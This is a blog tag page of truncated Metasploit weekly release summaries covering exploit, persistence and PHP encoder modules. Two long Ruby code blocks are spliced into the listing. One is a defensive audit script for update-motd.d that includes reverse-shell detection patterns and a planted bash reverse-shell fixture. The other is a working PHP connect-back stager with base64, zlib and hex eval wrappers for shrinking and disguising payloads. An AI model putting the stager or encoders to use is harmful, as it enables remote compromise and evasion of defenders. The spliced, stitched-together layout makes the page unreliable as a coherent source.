Posts tagged Metasploit

2 min Metasploit

Metasploit Weekly Wrap-Up 10/04/2024

New module content (3)

cups-browsed Information Disclosure
Authors: bcoles and evilsocket
Type: Auxiliary
Pull request: #19510 [https://github.com/rapid7/metasploit-framework/pull/19510] contributed by bcoles [https://github.com/bcoles]
Path: scanner/misc/cups_browsed_info_disclosure
Description: Adds a scanner module to retrieve CUPS version and kernel version information from cups-browsed services.

Acronis Cyber Infrastructure default password remote code execution
Authors: Acronis Internatio

3 min Metasploit

Metasploit Weekly Wrap-Up 09/27/2024

Epic Release!

This week's release includes 5 new modules, 6 enhancements, 4 fixes and 1 documentation update. Among the new additions, we have an account takeover, SQL injection, RCE, and LPE! Thank you to all the contributors who made it possible!

New Module Content (5)

Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)
Authors: Michael Heinzl and Mohammed Adel
Type: Auxiliary
Pull request: #19375 [https://github.com/rapid7/metasploit-framework/pull/19375] contribut

2 min Metasploit

Metasploit Weekly Wrap-Up 09/20/2024

New module content (3)

update-motd.d Persistence
Author: Julien Voisin
Type: Exploit
Pull request: #19454 [https://github.com/rapid7/metasploit-framework/pull/19454] contributed by jvoisin [https://github.com/jvoisin]
Path: linux/local/motd_persistence
Description: This adds a post module to keep persistence on a Linux target by writing a motd [https://manpages.ubuntu.com/manpages/trusty/man5/update-motd.5.html] bash script triggered with root privileges every time a user logs into the system
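The module above drops a script into update-motd.d, which root executes at every interactive login, so the defender-side question is "what is in that directory and does it belong there?". The following Ruby is an added example written for this page, not code from the Metasploit module: it audits a directory for world-writable, recently modified or stager-looking scripts. The pattern list, the 7-day window and the constructed fixture directory are my own assumptions.

```ruby
# Added example: audit an update-motd.d directory for planted scripts.
# Not part of the Metasploit module; patterns and thresholds are my own choices.
require 'tmpdir'

MOTD_DIR = '/etc/update-motd.d'

# Content that has no business in a MOTD script but is typical of a stager.
SUSPICIOUS = {
  'bash /dev/tcp reverse-shell' => %r{/dev/tcp/},
  'netcat with -e'              => /\bnc\b[^\n]*\s-e\s/,
  'base64 decode-and-run'       => /base64\s+(-d|--decode)/,
  'pipe-to-shell download'      => /\b(curl|wget)\b[^\n]*\|\s*(ba)?sh\b/,
  'scripting-language socket'   => /\b(python[23]?|perl|ruby)\b[^\n]*socket/
}.freeze

# Returns [{ path:, reasons: [...] }] for regular files under dir that look
# planted. root_uid is a parameter only so the demo can run as a non-root user.
def audit_motd_dir(dir, root_uid: 0, recent_days: 7, now: Time.now)
  hits = []
  Dir.children(dir).sort.each do |name|
    path = File.join(dir, name)
    next unless File.file?(path)
    st = File.stat(path)
    reasons = []
    reasons << "not owned by uid #{root_uid}" if st.uid != root_uid
    reasons << 'world-writable (anyone can inject root-executed code)' if st.mode & 0o002 != 0
    reasons << "modified within #{recent_days} days" if now - st.mtime < recent_days * 86_400
    content = File.read(path)
    SUSPICIOUS.each { |label, re| reasons << "content matches #{label}" if content.match?(re) }
    hits << { path: path, reasons: reasons } unless reasons.empty?
  end
  hits
end

# Constructed fixture (assumption, not a real system): one stock-looking header
# script aged 30 days and one freshly planted, world-writable reverse shell.
def build_demo_dir(dir, now: Time.now)
  benign = File.join(dir, '00-header')
  File.write(benign, "#!/bin/sh\nprintf 'Welcome to %s\\n' \"$(hostname)\"\n")
  File.chmod(0o755, benign)
  old = now - 30 * 86_400
  File.utime(old, old, benign)

  planted = File.join(dir, '99-update')
  File.write(planted, "#!/bin/bash\nbash -i >& /dev/tcp/192.0.2.10/4444 0>&1 &\n")
  File.chmod(0o777, planted)
  [benign, planted]
end

if __FILE__ == $PROGRAM_NAME
  # With a directory argument, audit it as root would; otherwise audit the fixture.
  dir = ARGV[0] || Dir.mktmpdir.tap { |d| build_demo_dir(d) }
  audit_motd_dir(dir, root_uid: ARGV[0] ? 0 : Process.uid).each do |hit|
    puts hit[:path]
    hit[:reasons].each { |r| puts "  - #{r}" }
  end
end
```

Run it as `ruby audit.rb /etc/update-motd.d` on a real host. Pattern matching is only a first pass: a quieter persistence script can simply call another file, so the stronger check is to compare every entry against the package manager's manifest (for example `dpkg -S` on Debian-derived systems) and treat anything unowned as suspect.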

2 min Metasploit

Metasploit Weekly Wrap-Up 09/13/2024

SPIP Modules

This week brings more modules targeting the SPIP publishing platform. SPIP has gained some attention from Metasploit community contributors recently and has inspired some PHP payload and encoder improvements.

New module content (2)

SPIP BigUp Plugin Unauthenticated RCE
Authors: Julien Voisin, Laluka, Valentin Lobstein, and Vozec
Type: Exploit
Pull request: #19444 [https://github.com/rapid7/metasploit-framework/pull/19444] contributed by Chocapikk [https://github.com/Chocapikk]
Pat

2 min Metasploit

Metasploit Weekly Wrap-Up 09/06/2024

Honey, I shrunk the PHP payloads

This release contains more PHP payload improvements from Julien Voisin. Last week we landed a PR from Julien that added a datastore option to the php/base64 encoder that, when enabled, uses zlib to compress the payload, which significantly reduces its size, bringing a payload of 4040 bytes down to a mere 1617 bytes. This week's release includes a php/minify encoder which removes all unnecessary characters from the payload including comments, empty lines, leadin

4 min Metasploit

Metasploit Weekly Wrap-Up 08/30/2024

A New Way to Encode PHP Payloads

A new PHP encoder has been released by a community contributor, jvoisin [https://github.com/jvoisin], allowing a PHP payload to be encoded as an ASCII-Hex string. This can then be decoded on the receiver, which avoids issues with unescaped or otherwise bad characters in transit.

Ray Vulnerabilities

This release of Metasploit Framework also features 3 new modules to target ray.io, which is a framework for distributing AI-related workloads across multiple machines, which makes it an exce
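The ASCII-hex encoder above, and the php/base64 zlib-compression option and php/minify encoder from the 09/06 wrap-up, all address the same problem: getting PHP source to the target in a form that survives transport, at an acceptable size. As an added example, not Metasploit's encoder code, the following Ruby implements those three wrappers over a constructed stager so their sizes can be compared. The PHP decoder stubs (base64_decode, gzuncompress, hex2bin) are my assumption of what the receiver side looks like, and the minifier is a deliberately simple scanner that only knows about comments and string literals.

```ruby
# Added example: three PHP payload wrappers in the spirit of the php/base64
# (with and without zlib), php/minify and ASCII-hex encoders. Illustrative Ruby,
# not Metasploit's encoder code; decoder stubs are an assumption.
require 'zlib'
require 'base64'

# Constructed sample payload (documentation address range, not a real stager).
SAMPLE_PHP = <<~'PHP'
  <?php
  /* Demo stager: constructed for this example, not a Metasploit payload */
  $host = "192.0.2.10";   // attacker host
  $port = 4444;

  // connect back and execute whatever we are sent, one line at a time
  $sock = fsockopen($host, $port);
  if ($sock) {
      while (!feof($sock)) {
          $line = fgets($sock);
          eval($line);   # run it
      }
  }
PHP

# Minifier: drops /* */, // and # comments outside string literals, then strips
# leading/trailing whitespace per line and removes empty lines.
# Assumption: the payload uses no PHP 8 "#[...]" attributes and no heredocs.
def minify_php(src)
  out = +''
  quote = nil
  i = 0
  while i < src.length
    c = src[i]
    if quote                            # inside a string literal: copy verbatim
      out << c
      if c == '\\' && i + 1 < src.length
        i += 1
        out << src[i]
      elsif c == quote
        quote = nil
      end
    elsif c == '"' || c == "'"
      quote = c
      out << c
    elsif src[i, 2] == '/*'             # block comment: skip past closing */
      j = src.index('*/', i + 2)
      i = j ? j + 1 : src.length - 1
    elsif src[i, 2] == '//' || c == '#' # line comment: skip to (not past) newline
      j = src.index("\n", i)
      i = j ? j - 1 : src.length - 1
    else
      out << c
    end
    i += 1
  end
  out.lines.map(&:strip).reject(&:empty?).join("\n")
end

# eval() on the receiver wants code without the open tag.
def strip_open_tag(php)
  php.sub(/\A\s*<\?php\s*/, '')
end

def encode_base64(body)
  Base64.strict_encode64(body)
end

# zlib (RFC 1950) stream, which PHP's gzuncompress() understands.
def encode_base64_zlib(body)
  Base64.strict_encode64(Zlib::Deflate.deflate(body, Zlib::BEST_COMPRESSION))
end

# Only [0-9a-f] cross the wire, so nothing needs escaping.
def encode_hex(body)
  body.unpack1('H*')
end

def wrap_base64(body)
  "eval(base64_decode('#{encode_base64(body)}'));"
end

def wrap_base64_zlib(body)
  "eval(gzuncompress(base64_decode('#{encode_base64_zlib(body)}')));"
end

def wrap_hex(body)
  "eval(hex2bin('#{encode_hex(body)}'));"
end

# Byte size of each form, so the trade-offs can be seen on real input.
def size_report(php)
  raw  = strip_open_tag(php)
  body = strip_open_tag(minify_php(php))
  { raw: raw.bytesize, minified: body.bytesize,
    base64: wrap_base64(body).bytesize, base64_zlib: wrap_base64_zlib(body).bytesize,
    hex: wrap_hex(body).bytesize }
end

if __FILE__ == $PROGRAM_NAME
  size_report(SAMPLE_PHP).each { |name, bytes| printf("%-12s %5d bytes\n", name, bytes) }
  puts wrap_hex(strip_open_tag(minify_php(SAMPLE_PHP)))
end
```

Two practical points the numbers make visible: hex always doubles the body, so it buys robustness at a size cost, and zlib only pays off on payloads large enough to amortise its header and checksum, so on a tiny stager the compressed form can be no smaller (or even larger) than plain base64. Minification is the one transform that is free, which is why it composes well before either encoder.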

1 min Metasploit

Metasploit Weekly Wrap-Up 08/23/2024

New module content (3)

Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #19373 [https://github.com/rapid7/metasploit-framework/pull/19373] contributed by h4x-x0r [https://github.com/h4x-x0r]
Path: admin/http/fortra_filecatalyst_workflow_sqli
AttackerKB reference: CVE-2024-5276 [https://attackerkb.com/search?q=CVE-2024-5276&referrer=blog]
Description: This adds an auxiliary module to exploit CVE-2024-5276, a SQL inj

2 min Metasploit

Metasploit Weekly Wrap-Up 08/16/2024

New module content (3)

Apache HugeGraph Gremlin RCE
Authors: 6right and jheysel-r7
Type: Exploit
Pull request: #19348 [https://github.com/rapid7/metasploit-framework/pull/19348] contributed by jheysel-r7 [https://github.com/jheysel-r7]
Path: linux/http/apache_hugegraph_gremlin_rce
AttackerKB reference: CVE-2024-27348 [https://attackerkb.com/search?q=CVE-2024-27348&referrer=blog]
Description: Adds an Apache HugeGraph Server exploit for GHSA-29rc-vq7f-x335 [https://github.com/advisories/GHSA-29r

1 min Metasploit

Metasploit Weekly Wrap-Up 08/09/2024

Black Hat & DEF CON

Hopefully folks were able to catch our Rapid7 researchers @zeroSteiner [https://x.com/zeroSteiner] & Jack Heysel show off Metasploit 6.4's features at Black Hat, focusing on combinations that allow for new, streamlined attack workflows. If not, they will also be demoing at DEF CON tomorrow in room W304!

New module content (1)

Calibre Python Code Injection (CVE-2024-6782)
Authors: Amos Ng and Michael Heinzl
Type: Exploit
Pull request: #19357 [https://github.com/rapid7/meta

2 min Metasploit

Metasploit Weekly Wrap-Up 08/02/2024

Metasploit goes to Hacker Summer Camp

Next week, Metasploit will have demos at both Black Hat [https://www.blackhat.com/us-24/arsenal/schedule/index.html#the-metasploit-framework-39570] and DEF CON [https://defcon.org/html/defcon-32/dc-32-demolabs.html#54186] where the latest functionality from this year will be presented. The Black Hat demo will be on Thursday the 8th from 10:10 to 11:25 and the DEF CON demo will be on Saturday the 10th from 12:00 to 13:45. The highlights will include demonst

2 min Metasploit

Metasploit Weekly Wrap-Up 07/26/2024

New module content (3)

Magento XXE Unserialize Arbitrary File Read
Authors: Heyder and Sergey Temnikov
Type: Auxiliary
Pull request: #19304 [https://github.com/rapid7/metasploit-framework/pull/19304] contributed by heyder [https://github.com/heyder]
Path: gather/magento_xxe_cve_2024_34102
AttackerKB reference: CVE-2024-34102 [https://attackerkb.com/search?q=CVE-2024-34102&referrer=blog]
Description: This adds an auxiliary module for an XXE which results in an arbitrary file in Magento which is

2 min Metasploit Weekly Wrapup

Metasploit Weekly Wrap-Up 7/19/2024

A new unauthenticated RCE exploit for GeoServer, plus library and Meterpreter updates and enhancements.

2 min Metasploit

Metasploit Weekly Wrap-Up 07/12/2024

The Usual Suspects

This release features two new exploits targeting old friends: Confluence and Ivanti. CVE-2024-21683 [https://attackerkb.com/search?q=CVE-2024-21683&referrer=blog] is a very easy vulnerability to exploit, but as pointed out in the AttackerKB Review [https://attackerkb.com/assessments/5ad314a1-9fd7-47d7-835f-f29680b3961d?referrer=blog], it requires authentication as a ‘Confluence Administrator.’ On the other hand, CVE-2024-29824 is an unauthenticated SQL Injection in Ivanti End

2 min Metasploit

Metasploit Weekly Wrap-Up 07/05/2024

3 new modules - MOVEit Transfer authentication bypass CVE-2024-5806, Zyxel command injection, and Azure CLI credentials gatherer

2 min Metasploit

Metasploit Weekly Wrap-Up 06/28/2024

Unauthenticated Command Injection in Netis Router

This week's Metasploit release includes an exploit module for an unauthenticated command injection vulnerability in the Netis MW5360 router, tracked as CVE-2024-22729. The vulnerability stems from improper handling of the password parameter within the router's web interface, which allows for command injection. Fortunately for attackers, the router's login page authorization can be bypassed by simply deleting the authorization header,